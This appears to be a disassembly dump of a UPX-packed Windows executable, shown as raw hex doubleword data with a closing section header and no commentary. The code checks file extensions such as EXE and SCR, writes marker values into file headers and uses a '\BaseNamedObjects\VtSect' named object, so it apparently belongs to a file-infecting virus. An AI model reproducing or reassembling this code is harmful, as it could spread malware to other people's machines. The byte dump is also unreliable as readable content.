dd 8500103Eh, 53840FC0h, 89000005h, 1042B485h, 27B8C300h
dd 8B000073h, 85F7384Bh, 1039C0h, 20000000h, 85030675h
dd 101069h, 0C103D233h, 0E1F7F1F7h, 42C08589h, 0CBB80010h
dd 8B000029h, 85033C4Bh, 101069h, 0C103D233h, 0E1F7F1F7h
dd 42B88589h, 0FC30010h, 0F9064BB7h, 538D35E3h, 43B70F18h
dd 49D00314h, 328C16Bh, 5F3A81D0h, 0F96E6977h, 7A831D74h
dd 0E072010Ch, 8B3C4B8Bh, 42031442h, 48448D10h, 23D9F7FFh
dd 0AC853BC1h, 0C3001042h, 1024548Bh, 828FC033h, 0B8h
dd 0EBCF8BC3h, 84BD8D0Bh, 0FC001041h, 0C933DF8Bh, 72613CACh
dd 777A3C06h, 0AA202C02h, 0EC745C3Ch, 0DD742E3Ch, 0E875003Ch
dd 18BC9E3h, 4558453Dh, 3D0B7400h, 524353h, 0FF33850Fh
dd 38BFFFFh, 4E49573Dh, 26840F43h, 3DFFFFFFh, 4E554357h
dd 0FF1B840Fh, 573DFFFFh, 0F323343h, 0FFFF1084h, 53503DFFh
dd 840F4F54h, 0FFFFFF05h, 2DE8DB33h, 75FFFFFEh, 0FCFAE810h
dd 21E8FFFFh, 0FFFFFFEh, 0FFFEEC84h, 0E8D233FFh, 16h, 0FFFF63E8h
dd 0E8FFh, 815D0000h, 10344FEDh, 3FAE900h, 0FF640000h
dd 0B4B58B32h, 64001042h, 81662289h, 0F5A4D3Eh, 3E385h
dd 3C5E8B00h, 8166DE03h, 0F45503Bh, 3D385h, 1643F700h
dd 2000h, 3C6850Fh, 43F60000h, 840F025Ch, 3BCh, 3D08438Bh
dd 0A0A0A0A0h, 3AE840Fh, 203D0000h, 0F202020h, 3A384h
dd 0C88B8B00h, 0E3000000h, 54E85116h, 3FFFFEFh, 1042F88Dh
dd 83CE0300h, 83004061h, 0E8004461h, 0FFFFFE9Bh, 37A820Fh
dd 0A5830000h, 1042FCh, 8428B00h, 2B104A8Bh, 330473C1h
dd 305EBC0h, 104A89C8h, 42BC8589h, 4A030010h, 0B80Ch, 0E8510001h
dd 0FFFFE68Ah, 39BE9530h, 20B10010h, 39BFB530h, 206A0010h
dd 7858C9FEh, 0E670E814h, 0D285FFFFh, 0D3C2940Fh, 0C09531E2h
dd 0EB001039h, 0C085F7E5h, 1039h, 74020000h, 0C085F722h
dd 3001039h, 75000000h, 0C0A5810Ch, 0FF001039h, 0EBF7FFFFh
dd 0C08D810Ah, 1039h, 68100000h, 6, 66859h, 0E8580000h
dd 0FFFFE622h, 39B8858Ah, 84860010h, 1039B82Ah, 0B8858800h
dd 0E2001039h, 0C085F7E0h, 8001039h, 75000000h, 0BABD8009h
dd 1001039h, 85F7C574h, 1039C0h, 10000000h, 0BD801B74h
dd 1039B8h, 80B07405h, 1039B9BDh, 0A7740500h, 39BABD80h
dd 74050010h, 0C085F79Eh, 1039h, 74004000h, 0B8BD8009h
dd 2001039h, 0A5838977h, 104300h, 0F272E800h, 43E8FFFFh
dd 0E8FFFFFDh, 271h, 42B89D8Bh, 9D030010h, 1042BCh, 0FFFC5BE8h
dd 51840FFFh, 8B000002h, 1042B4B5h, 3C5E8B00h, 5CE8DE03h
dd 0FFFFFFDh, 23B82h, 244A8100h, 0E0000060h, 5652FE8Bh
dd 3147A03h, 85F7107Ah, 1039C0h, 20000000h, 0BD891475h
dd 104304h, 39CCB58Dh, 8D8B0010h, 101069h, 0B957A4F3h
dd 0A73h, 1000B58Dh, 0A5F30010h, 2E300B1h, 85F7A4F3h, 1039C0h
dd 20000000h, 0AE840Fh, 73FF0000h, 0ED9DE828h, 958BFFFFh
dd 1042F4h, 840FD285h, 98h, 42B4B58Bh, 4A8B0010h, 244A8110h
dd 0E0000060h, 73084A2Bh, 3C93302h, 8D3B1472h, 101069h
dd 10698D8Bh, 56720010h, 83243C8Bh, 101069A5h, 0A7830000h
dd 69h, 87A8B00h, 3084A01h, 8BF787F7h, 1042C885h, 0C085F700h
dd 40001039h, 74000000h, 318F702h, 30290C72h, 4300B589h
dd 738B0010h, 0F7300128h, 1039C085h, 4000h, 0F7027400h
dd 2BE85118h, 59FFFFFCh, 73030CEBh, 0C722B28h, 0A4F35651h
dd 0B58D595Fh, 1039CCh, 4304BD89h, 0A4F30010h, 310F5E5Fh
dd 37878D92h, 3A000001h, 1039BE95h, 69067500h, 345678D2h
dd 50896612h, 0D9E1E8E7h, 8B5AFFFFh, 4A030C4Ah, 0C085F710h
dd 1039h, 8D200000h, 13750541h, 43008D89h, 85030010h, 101069h
dd 69A783h, 2B000000h, 87892843h, 54h, 3F7C85F7h, 10010h
dd 7740000h, 0A00843C7h, 0F7A0A0A0h, 1039C085h, 40000000h
dd 52077400h, 0FFF75BE8h, 8D8B5AFFh, 104300h, 4B8905E3h
dd 8B0DEB28h, 1042FC8Dh, 0EB02E300h, 284B8B03h, 39C085F7h
dd 30010h, 14740000h, 4304858Bh, 8D030010h, 1042ECh, 42E88503h
dd 8010010h, 8B104A8Bh, 1042B885h, 84A3900h, 4A890373h
dd 10420108h, 586383h, 42C0858Bh, 0CC680010h, 1000029h
dd 1590842h, 958A5043h, 1039BEh, 39C085F7h, 10h, 6742000h
dd 10698D03h, 0B60010h, 39C085F7h, 10h, 14750002h, 85F7C6FEh
dd 1039C0h, 40000h, 0B58A0675h, 1039BFh, 39C085F7h, 40000010h
dd 0B750000h, 0C202078Ah, 0E2D602AAh, 8A09EBF7h, 0AAC23207h
dd 0F7E2D602h, 8B64D233h, 28F6422h, 98BD8358h, 1042h, 0FABF840Fh
dd 0B5FFFFFFh, 1042B4h, 3EEE95FFh, 0B5FF0010h, 1042B0h
dd 3E6295FFh, 8D8D0010h, 10429Ch, 42A4958Dh, 52510010h
dd 0B5FF006Ah, 104298h, 3EE295FFh, 0B5FF0010h, 104298h
dd 3E6295FFh, 0B58D0010h, 104184h, 4294B5FFh, 0FF560010h
dd 103EDE95h, 98A58300h, 1042h, 0E8C3h, 6A5D0000h, 0CBED8101h
dd 58001038h, 85C10FF0h, 101588h, 83C3C085h, 0FF0FFC8h
dd 158885C1h, 3DC30010h, 2A0010h, 81661C75h, 6C0C247Ch
dd 60137571h, 0FFFFC4E8h, 0E80575FFh, 0FFFFFAB5h, 0FFFFD2E8h
dd 0FF2E61FFh, 3456782Dh, 25B812h, 0E8600000h, 0FFFFFFA5h
dd 448B3975h, 0B58D3024h, 104184h, 6608508Bh, 2063A81h
dd 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h, 103F2Eh, 8108C483h
dd 3F3F5C3Eh, 8303755Ch, 62E804C6h, 0E8FFFFFAh, 0FFFFFF7Fh
dd 74B8C361h, 0EB000000h, 2FB8B1h, 1DE80000h, 0C2000000h
dd 30B80020h, 0E8000000h, 10h, 0B80024C2h, 185h, 3E8h
dd 2CC200h, 0C24548Dh, 0F8832ECDh, 60197C00h, 0E8h, 24548B00h
dd 1A8B5D30h, 39A2ED81h, 0B3E80010h, 61FFFFE0h, 30004C2h
dd 5010706h, 92F54202h, 0E893BCA8h, 0C8h, 0FF8B6Bh, 118h dup(0)
dd 5C000000h, 61004200h, 65007300h, 61004E00h, 65006D00h
dd 4F006400h, 6A006200h, 63006500h, 73007400h, 56005C00h
dd 53007400h, 63006500h, 7400h, 809B4700h, 8308AD7Ch, 9103317Ch
dd 80ADA07Ch, 7Ch, 0
dd 80BDB600h, 801A247Ch, 80945C7Ch, 8023677Ch, 81042C7Ch
dd 8106377Ch, 864B0F7Ch, 80C0587Ch, 80E7EC7Ch, 80ABDE7Ch
dd 81153C7Ch, 810A777Ch, 831C457Ch, 80B6A17Ch, 8608FF7Ch
dd 835DCA7Ch, 8111DA7Ch, 812ADE7Ch, 821BA57Ch, 801D777Ch
dd 80B9057Ch, 80BB767Ch, 8309E17Ch, 863DE57Ch, 863F587Ch
dd 8127827Ch, 831CB87Ch, 8024427Ch, 810B1C7Ch, 80B9747Ch
dd 809A517Ch, 810D877Ch, 90D4607Ch, 90D6827Ch, 90D7547Ch
dd 90D7697Ch, 90D7937Ch, 7Ch, 90DC5500h, 90DCFD7Ch, 90DD907Ch
dd 90DDBA7Ch, 90DEB67Ch, 90E0457Ch, 90EA327Ch, 9130C67Ch
dd 7Ch, 14h dup(0)
dd 320030h, 31014064h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 740056h
dd 650053h, 740063h, 0D2h dup(0)
dd 0D7000000h, 310110h, 1307h dup(0)
UPX2 ends
; Section 4. (virtual address 00019000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00019000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31019000h
align 2000h
_idata2 ends
end start